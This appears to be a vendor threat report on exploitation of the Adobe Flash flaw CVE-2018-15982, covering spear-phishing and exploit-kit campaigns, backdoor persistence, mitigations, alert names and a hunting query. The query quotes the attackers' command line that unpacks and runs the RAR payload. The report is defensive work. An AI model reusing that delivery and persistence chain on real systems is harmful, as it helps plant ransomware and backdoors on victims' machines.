CVE-2018-15982 exploit attacks
In late November 2018, a targeted attack against a medical institution in Russia exploited CVE-2018-15982, a zero-day remote code execution vulnerability in Adobe Flash Player. Adobe released an emergency patch in security bulletin APSB18-42 on December 5, 2018.
Attackers and security researchers alike typically gain access to exploits by reverse-engineering vendor patches or through sharing of proof-of-concept samples. As exploits are added to exploit kits and penetration testing tools, the use of the said exploit may become widespread. However, in the case of CVE-2018-15982, only one additional attack using the exploit has been reported so far, and that incident simply reused existing proof-of-concept content with no revisions. The lack of widespread abuse can likely be credited in part to Adobe’s swift action as well as to the highly targeted nature of the attack itself.
Nevertheless, the zero-day attack highlights a number of mitigations that defenders should take advantage of to block similar attacks.
Update: Inclusion in exploit kits
While we observed limited activity during the time when this exploit was reported, we’ve expected a rise in code variants as well as related attack activity.
In the middle of January 2019, we started observing multiple campaigns exploiting CVE-2018-15982 and even found exploit code in exploit kits—packages typically sold in the dark web that combine different sets of exploit code, allowing attacks to automatically leverage multiple alternative exploitation mechanisms whenever one mechanism fails. CVE-2018-15982 exploit code is present in prevalent campaigns through the infamous Underminer, Fallout, or KaiXin exploit kits.
These campaigns have been observed delivering the GandCrab ransomware and the Zegost backdoor, although the exploit kits can be used to deliver other payloads. Microsoft Defender ATP provides updated protection against recent campaigns exploiting CVE-2018-15982, with enhanced heuristic coverage against future variants.
Table of Contents
Initial attacks observed exploiting CVE-2018-15982 used spear-phishing emails with an attached RAR archive containing two files:
- A lure document
- A second RAR archive file disguised a .jpg file
When the user opens the lure document, an embedded Flash ActiveX control containing the exploit is rendered. A Flash ActionScript runs a small command script that in turn unpacks and runs the payload, the file backup.exe, from the second RAR archive.
The payload copies itself to %LOCALAPPDATA%\NvidiaControlPanel\NVIDIAControlPanel.exe and creates a scheduled task that starts the backdoor whenever a user logs in. It then collects local system information and uploads it to a hardcoded command-and-control (C&C) IP address every five minutes.
Prevalent attacks using exploit kits
More recent attack campaigns exploiting CVE-2018-15982 are delivered through sites serving malicious Adobe Flash advertisements. The ads host exploit kits, mostly Underminer, Fallout, and KaiXin, that contain exploit code for CVE-2018-15982, among other vulnerabilities.
Upon successful exploitation, a set of PowerShell commands excoded in base64 runs and downloads a malware payload. The payloads seen so far are the GandCrab ransomware and the Zegost malicious backdoor in separate campaigns.
Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- To address the exploit used by this threat, mitigate the following vulnerability: CVE-2018-15982.
- Use hardware-based isolation, provided through Windows Defender System Guard, and exploit protection capabilities in Windows 10. These capabilities provide strategic mitigation of exploitation techniques.
- Turn on cloud-delivered protection and automatic sample submission on Windows Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new variants and polymorphic copies of this threat.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use Office 365 ATP for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Office 365 to recheck links on click and delete sent mail in response to newly acquired threat intelligence.
- Turn on attack surface reduction rules, including rules that can block advanced macro activity, executable content, process creation, and process injection initiated by Office applications.
- Check your perimeter firewall and proxy to restrict servers from making arbitrary connections to the internet to browse or download files. Such restrictions help inhibit malware downloads and command-and-control (C&C) activity.
Windows Defender Antivirus detects threat components as the following malware:
Endpoint detection and response (EDR)
Alerts with the following titles in the Microsoft Defender Security Center portal can indicate threat activity on your network:
- A malicious file was detected based on indication provided by O365
- Malicious document (CVE-2018-15982) Detected
- CrisisHT backdoor detected
- Malicious SWF Files (CVE-2018-15982) Detected
Attack surface reduction rules
These rules can block or audit activity associated with this threat:
- Block all Office applications from creating child processes
- Block Office applications from creating executable content
To locate possible attack activity involving the extraction of the malicious RAR archive, run the following query:
ProcessCreationEvents | where FileName == "cmd.exe" | where ProcessCommandLine contains @"set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR;" | where ProcessCommandLine contains @"cd /d %~dp0 & rar.exe e -o+ -r -inul*.rar"
Secondary RAR archive
Exploit kit campaigns
SWF files (SHA-1)
- Flash 0day + Hacking Team RAT: Activities of Exploiting Latest Flash 0day Vulnerability and Correlation Analysis. Qihoo 360 Research (accessed 2019-01-14)
- Operation Poison Needles - APT Group Attacked the Polyclinic of the Presidential Administration of Russia, Exploiting a Zero-day. Qihoo 360 Total Security (accessed 2019-01-14)
- CVE-2018-15982 being used to push CobInt. RandomRE (@sysopfb) (accessed 2019-01-14)
- Improved Fallout EK comes back after short hiatus. Malwarebytes (accessed 2019-01-17)
- Fallout Exploit Kit is Back with New Vulnerabilities and Payloads. Bleeping Computer (accessed 2019-01-18)